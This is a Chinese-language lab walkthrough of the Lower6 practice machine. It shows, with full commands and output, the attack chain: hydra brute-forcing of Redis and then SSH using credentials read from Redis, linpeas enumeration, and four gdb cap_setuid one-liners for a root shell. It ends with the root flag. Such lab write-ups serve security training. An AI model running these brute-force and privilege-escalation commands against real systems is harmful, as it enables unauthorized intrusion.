# 靶场搭建
下载地址:Lower6
下载导入,NAT 模式,直接战斗
IP: 10.10.10.7
# 渗透过程
# 信息初收集
先扫一下服务
┌┌──(root㉿kali)-[~] | |
└─# nmap -p- -sV -T4 10.10.10.7 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-22 03:05 EDT | |
Nmap scan report for 10.10.10.7 | |
Host is up (0.00030s latency). | |
Not shown: 65533 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0) | |
6379/tcp open redis Redis key-value store | |
MAC Address: 08:00:27:55:D6:D8 (Oracle VirtualBox virtual NIC) | |
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds |
redis 和 ssh,盲猜是秘钥泄露了
看一下 redis 有没有匿名访问
┌──(root㉿kali)-[~] | |
└─# redis-cli -h 10.10.10.7 | |
10.10.10.7:6379> keys * | |
(error) NOAUTH Authentication required. | |
10.10.10.7:6379> |
没有,hydra 爆破吧
# 渗透
# redis 密码爆破
┌──(root㉿kali)-[~] | |
└─# hydra -t 64 redis://10.10.10.7 -P /usr/share/wordlists/rockyou.txt | |
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-22 03:09:57 | |
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task | |
[DATA] attacking redis://10.10.10.7:6379/ | |
[6379][redis] host: 10.10.10.7 password: hellow | |
[STATUS] attack finished for 10.10.10.7 (valid pair found) | |
1 of 1 target successfully completed, 1 valid password found | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-22 03:10:08 |
拿到密码: hellow
# 读取 redis 内容
┌──(root㉿kali)-[~] | |
└─# redis-cli -h 10.10.10.7 | |
10.10.10.7:6379> auth hellow | |
OK | |
10.10.10.7:6379> keys * | |
1) "key3" | |
2) "key2" | |
3) "key5" | |
4) "key4" | |
5) "key1" | |
10.10.10.7:6379> MGET key1 key2 key3 key4 key5 | |
1) "killer:K!ll3R123" | |
2) "ghost:Ghost!Hunter42" | |
3) "snake:Pixel_Sn4ke77" | |
4) "wolf:CyberWolf#21" | |
5) "shadow:ShadowMaze@9" | |
10.10.10.7:6379> |
# 爆破 ssh
拿到了用户名和密码,组成字典去爆破 ssh,不多直接手动做就可以了。
都试了一遍不行,说明可能是错位的。开始 Cluster Bomb
先把用户名和密码采集下来
redis-cli -h 10.10.10.7 -a hellow MGET key1 key2 key3 key4 key5 2>/dev/null |awk '{print $1}' |cut -d ':' -f1 >user.txt | |
redis-cli -h 10.10.10.7 -a hellow MGET key1 key2 key3 key4 key5 2>/dev/null |awk '{print $1}' |cut -d ':' -f2 >pass.txt |
┌──(root㉿kali)-[~]
└─# hydra -t 64 -L user.txt -P pass.txt ssh://10.10.10.7
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-22 03:32:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 25 tasks per 1 server, overall 25 tasks, 25 login tries (l:5/p:5), ~1 try per task
[DATA] attacking ssh://10.10.10.7:22/
[22][ssh] host: 10.10.10.7 login: killer password: ShadowMaze@9
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-22 03:32:17
拿到账号密码: killer:ShadowMaze@9
# 提权
上传信息收集工具
┌──(root㉿kali)-[~] | |
└─# wget https://github.com/peass-ng/PEASS-ng/releases/download/20251017-d864f4c3/linpeas.sh | |
--2025-10-22 03:53:12-- https://github.com/peass-ng/PEASS-ng/releases/download/20251017-d864f4c3/linpeas.sh | |
Resolving github.com (github.com)... 20.205.243.166 | |
Connecting to github.com (github.com)|20.205.243.166|:443... connected. | |
HTTP request sent, awaiting response... 302 Found | |
Location: https://release-assets.githubusercontent.com/github-production-release-asset/165548191/8b396ddb-bfa5-42be-b5d9-1d719eccfdf8?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-22T08%3A51%3A02Z&rscd=attachment%3B+filename%3Dlinpeas.sh&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-22T07%3A50%3A31Z&ske=2025-10-22T08%3A51%3A02Z&sks=b&skv=2018-11-09&sig=Vve%2BiHdCGkWiRK8gUN%2F6OQeRlWOcOVerZc7DKj6L98g%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc2MTExOTg5MiwibmJmIjoxNzYxMTE5NTkyLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.EBZkOCkCcULs2dQ3ZNXQpPISUBxqN02Fuz5RwGjPiRY&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following] | |
--2025-10-22 03:53:13-- https://release-assets.githubusercontent.com/github-production-release-asset/165548191/8b396ddb-bfa5-42be-b5d9-1d719eccfdf8?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-22T08%3A51%3A02Z&rscd=attachment%3B+filename%3Dlinpeas.sh&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-22T07%3A50%3A31Z&ske=2025-10-22T08%3A51%3A02Z&sks=b&skv=2018-11-09&sig=Vve%2BiHdCGkWiRK8gUN%2F6OQeRlWOcOVerZc7DKj6L98g%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc2MTExOTg5MiwibmJmIjoxNzYxMTE5NTkyLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.EBZkOCkCcULs2dQ3ZNXQpPISUBxqN02Fuz5RwGjPiRY&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream | |
Resolving release-assets.githubusercontent.com (release-assets.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, ... | |
Connecting to release-assets.githubusercontent.com (release-assets.githubusercontent.com)|185.199.110.133|:443... connected. | |
HTTP request sent, awaiting response... 200 OK | |
Length: 971926 (949K) [application/octet-stream] | |
Saving to: 'linpeas.sh' | |
linpeas.sh 100%[==================================>] 949.15K 1.20MB/s in 0.8s | |
2025-10-22 03:53:15 (1.20 MB/s) - 'linpeas.sh' saved [971926/971926] | |
┌──(root㉿kali)-[~] | |
└─# scp scp linpeas.sh [email protected]:~ | |
[email protected]'s password: | |
linpeas.sh 100% 949KB 49.2MB/s 00:00 |
运行一下,发现存在 gdb
╔══════════╣ Checking sudo tokens | |
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens | |
ptrace protection is disabled (0), so sudo tokens could be abused | |
gdb was found in PATH | |
doas.conf Not Found |
可以通过 gdb 窃取 sudo 令牌来实现权限提升,可以进一步检查看到
killer@lower6:~$ /usr/sbin/getcap -r / 2>/dev/null | |
/usr/bin/ping cap_net_raw=ep | |
/usr/bin/gdb cap_setuid=ep |
在这里可以看到当前用户能够执行 ping 和 gdb ,且权限解析如下:
在 Linux 中,能力系统替代了传统的 "全有或全无" 的 root 权限模型:
- cap_net_raw: 原始网络访问(ping、tcpdump 等)
- cap_setuid: 修改进程用户 ID
- cap_setgid: 修改进程组 ID
- cap_sys_admin: 系统管理操作
权限标志:
- e: Effective(当前有效)
- p: Permitted(允许使用)
- i: Inheritable(可继承)
因此 gdb 可以拥有 root 权限
因此,我们可以直接进行利用。
# gdb 提权
# 方法1:使用gdb直接提升权限 | |
/usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex 'python import os; os.system("/bin/bash")' -ex quit | |
# 方法2:通过调试其他进程 | |
/usr/bin/gdb -p 1 | |
# 在gdb中执行: | |
# (gdb) call setuid(0) | |
# (gdb) shell /bin/bash | |
# 方法3:创建SUID shell | |
/usr/bin/gdb -nx -ex 'python import os; os.system("chmod +s /bin/bash")' -ex quit | |
/bin/bash -p # 现在bash以root权限运行: | |
# 方法4:直接获取root shell | |
/usr/bin/gdb -q | |
(gdb) python import os; os.setuid(0) | |
(gdb) python import os; os.system("/bin/bash") | |
# 现在你应该是root用户了 |
killer@lower6:~$ /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex 'python import os; os.system("/bin/bash")' -ex quit | |
GNU gdb (Debian 13.1-3) 13.1 | |
Copyright (C) 2023 Free Software Foundation, Inc. | |
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> | |
This is free software: you are free to change and redistribute it. | |
There is NO WARRANTY, to the extent permitted by law. | |
Type "show copying" and "show warranty" for details. | |
This GDB was configured as "x86_64-linux-gnu". | |
Type "show configuration" for configuration details. | |
For bug reporting instructions, please see: | |
<https://www.gnu.org/software/gdb/bugs/>. | |
Find the GDB manual and other documentation resources online at: | |
<http://www.gnu.org/software/gdb/documentation/>. | |
For help, type "help". | |
Type "apropos word" to search for commands related to "word". | |
root@lower6:~# cat /root/root.txt | |
03f4adf5855fe3a1e0df4b0c885ec67a |
